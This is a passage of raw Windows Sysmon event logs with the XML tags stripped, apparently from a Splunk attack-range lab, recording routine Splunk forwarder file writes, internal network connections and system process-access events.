23542300x800000000000000045553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:24.178{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20F23AABB75D8C579D36DA93B40904DD,SHA256=05C0C40E1C71B84ED59038BE04C171B22B7153F3631E939AD3288B6EE343BF95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017948Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:24.124{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=657AC396DBAD4547A2C5A3F9C2DE92B4,SHA256=D838FAF535B36CEBA97E1865E344FAD978F5A399EC12970143DDDB3650C379E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:23.487{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56430-false10.0.1.12-8000- 23542300x800000000000000045554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:25.283{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1EAEDD2711CA6C680C98F821398EAC7,SHA256=F143CAA5B415E623FA428679EA6FA92FE02FFA470A7730A2514716846991A74A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017953Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:25.673{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017952Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:25.673{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017951Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:25.673{E5A8D418-DC43-63C7-0B00-00000000B002}6323836C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017950Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:25.658{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017949Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:25.199{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35C53D5CFABBFF953AAAEF71DFC8FAFD,SHA256=DE30CA4F74E03C09730F370A656A230884588E8FB5AECFB332E5D423E0A6F917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:26.594{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=6B014FC78C6A5B5BD308CE7628F85555,SHA256=15F2B217916D985344E5B85CEDE5238C5697D3F263CA859C148B2728E58F67AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:26.378{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17947F5B7D755122A52A5561DEAF07B5,SHA256=AAA7747906217915141B602A10401E3F458FFAAABBADCB2F6901A56A79065750,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:26.316{FE4C2B44-D9F5-63C7-1600-00000000AF02}12966304C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bca3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22acf|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+2c9ae|C:\Windows\system32\wbem\wbemcore.dll+202cc|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22baa|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+22701|C:\Windows\system32\wbem\wbemcore.dll+2d77c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:26.316{FE4C2B44-D9F5-63C7-1600-00000000AF02}12966304C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bca3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22acf|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+2c9ae|C:\Windows\system32\wbem\wbemcore.dll+202cc|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22baa|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+22701|C:\Windows\system32\wbem\wbemcore.dll+2d77c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000017955Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:24.933{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50159-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017954Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:26.264{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=976F1CAE40E88FBAA18208354DB58D63,SHA256=7191369E2508D66FC74C58729449B5C0814DD7BBC47CE4B54760AA562D859C55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:27.725{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:27.363{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6A14281F7074F499BFA866FB9563BDF,SHA256=A610D4EDF47075BC7E8A70BD2929158746CE94124B7C7C6AD04B2492A8C01204,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017956Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:27.332{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D543C0F610FE3F6C300C7441D163A098,SHA256=CD198E72CDE734ADFA94FDD79CCF807D8E93E9CBA0150A0A917870F7938BC9F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.968{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5B0-63C7-7106-00000000AF02}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.968{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.968{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.968{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.968{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.968{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E5B0-63C7-7106-00000000AF02}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.968{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5B0-63C7-7106-00000000AF02}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.968{FE4C2B44-E5B0-63C7-7106-00000000AF02}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.841{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F1-63C7-0100-00000000AF02}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\kerberos.DLL+97b62|C:\Windows\system32\kerberos.DLL+79e38|C:\Windows\system32\kerberos.DLL+144ff|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+2d8f6|C:\Windows\system32\lsasrv.dll+33189|C:\Windows\system32\lsasrv.dll+30ad7|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+17a7d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x800000000000000045562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:28.462{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E990781C7D179BA35777337C9A9D953A,SHA256=224600BD53C7C270D1B3498FF4CF743B75314B76A1A0C7E7DA6C0C8F646A950A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017957Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:28.405{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9291531B4DCBCFE4F3B592783A8806EA,SHA256=A524B4EBD41E42F8268CB29A285B478E80629D6E7C766899E6563EA955A74133,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.979{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D80C04C3B33FAA527BA8766EA8A22747,SHA256=B4C708A53472A5CF0B83C50EF58861AF4ABAAD488BC47E85925D7F13B7853D55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.751{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5B1-63C7-7206-00000000AF02}1600C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.751{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 